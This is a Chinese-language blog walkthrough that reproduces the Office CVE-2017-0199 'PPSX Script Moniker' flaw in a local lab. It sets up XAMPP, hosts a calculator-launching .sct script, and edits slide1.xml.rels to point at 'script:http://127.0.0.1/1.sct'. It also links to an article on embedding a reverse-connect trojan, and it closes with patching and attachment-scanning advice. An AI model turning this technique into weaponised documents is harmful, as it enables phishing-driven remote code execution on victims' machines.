在剛剛結束的BlackHat2017黑帽大會上，最佳客戶端安全漏洞獎頒給了CVE-2017-0199漏洞，這個漏洞是Office系列辦公軟件中的一個邏輯漏洞，和常規的內存破壞型漏洞不同，這類漏洞無需復雜的利用手法，直接就可以在office文檔中運行任意的惡意腳本，使用起來穩定可靠，故而非常適合於漏洞學習新手測試調試使用，作為一個已經測試過該漏洞的新手，現將搭建環境和測試的全部過程呈獻給大家，希望能對大家的學習有所幫助。

CVE-2017-0199實際上包含兩個漏洞，其中一個稱為“RTF URL Moniker”漏洞，另一個被稱為“PPSX Script Moniker”漏洞，在這裏我們演示一下PPSXScript Moniker漏洞的測試方式。

首先準備一臺apache服務器，為了簡化配置apache的過程，在這裏我們直接安裝xampp，XAMPP是一個把Apache網頁服務器與PHP、Perl及MariaDB集合在一起的安裝包，允許用戶可以在自己的電腦上輕易的建立網頁服務器，安裝起來十分簡單，無需配置其它設置。安裝完成後，我們打開IE瀏覽器，輸入http://127.0.0.1，如果能夠跳轉到XAMPP的歡迎界面，就認為服務器已經搭建成功了。

圖1：XAMPP歡迎界面

如果你安裝XAMPP時選擇的是默認路徑，那麽你可以在C盤的根目錄下找到該軟件，下一步我們要做的工作時在服務器的目錄下添加一個sct腳本，此處作為測試該腳本是否執行，我們讓該腳本啟動一個計算器程序，sct腳本代碼如下：

圖2：啟動計算器腳本代碼

我們將該腳本命名為1.sct，存放在C:\xampp\htdocs\路徑下，以便於接下來我們使用的PPSX能夠鏈接並執行改腳本。

第三步，我們修改ppsx樣本文件，樣本的地址可以從https://github.com/temesgeny/ppsx-file-generator網址處下載到。下載到的文件中包含一個python腳本和生成好的template.ppsx，我們直接改造template.ppsx模板，首先將改文件的後綴名改為.zip，然後將壓縮文件解壓，解壓後的文件內容如下圖所示：

圖3：模板ppsx文件解壓後文件內容

我們在路徑ppt\slides\_rels下找到slide1.xml.rels文件，我們將圖中用藍色圈出的路徑用我們自己服務的地址來替換，即更改為Target="script:http://127.0.0.1/1.sct"

圖4：更改前slide1.xml.rels文件內容

更改完成後，我們將解壓的四個文件重新以zip的格式壓縮，這裏註意不要直接壓縮上一層路徑的template文件夾，否則壓縮後會出現兩層文件夾，壓縮任務完成後，我們把壓縮文件的後綴名重新更正為template.ppsx，然後再次打開該文件，結果如下圖所示：

圖5：漏洞利用結果圖

可以觀察到，在打開ppsx文件後，我們嵌入在ppsx中的遠程地址鏈接並下載了1.sct腳本，然後執行了該腳本，成功的開啟了一個計算器程序。

關於RTF URL Moniker的漏洞測試在http://www.freebuf.com/articles/system/131969.html 這篇文章中寫的非常詳細了，實測能夠成功復現漏洞，在這裏就不再重復贅述了。

最後給大家推薦幾個鏈接，在了解CVE-2017-0199漏洞的過程中，分別參考了這幾篇文章：

（1）《Moniker魔法：直接在Microsoft Office中運行腳本》http://bbs.pediy.com/thread-219234.htm 這篇文章對漏洞發現的過程和原理描述的非常清晰，對底層比較感興趣的同學可以了解學習一下

（2）http://www.freebuf.com/vuls/144054.html 這篇文章提供了一個ppsx的高級利用方式，在ppsx中嵌入了kali生成的回連木馬。

?最後給廣大用戶朋友們提幾點建議，防止惡意程序給您帶來不必要的損失： ?

1. 及時更新最新補丁，安裝殺毒軟件，最大限度保證自己不受惡意軟件侵害

2. 若收到郵件包含附件，不要直接打開，很可能是利用這個漏洞進行攻擊釣魚郵件，一旦打開將直接中招，先查殺再打開，來歷不明的郵件別收

3. 網上下的word文檔、PPSX、PPT文件別隨意打開，先查殺。

希望小子的文章值得你收藏與轉發，關註安全小子，安全路上，你我同行：

?

Office遠程代碼執行漏洞CVE-2017-0199復現